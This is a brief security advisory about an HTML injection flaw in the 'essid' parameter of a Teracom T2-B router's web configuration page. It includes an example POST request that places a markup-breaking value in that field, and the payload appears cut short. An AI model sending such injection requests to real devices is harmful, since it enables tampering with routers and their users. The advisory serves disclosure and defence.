Teracom T2-B-Gawv1.4U10Y-BI 'essid' Parameter HTML Injection Vulnerability

An attacker can exploit this issue using a web browser.

The following example request is available:

POST
http://www.example.com/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=5&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=4&essid=">%3E&hidessid=off&security=wpawpa2&authmethodselect=psk&wpapp=---&pmkcaching=off&confirm=Confirm


 

Privacy Statement
Copyright 2010, SecurityFocus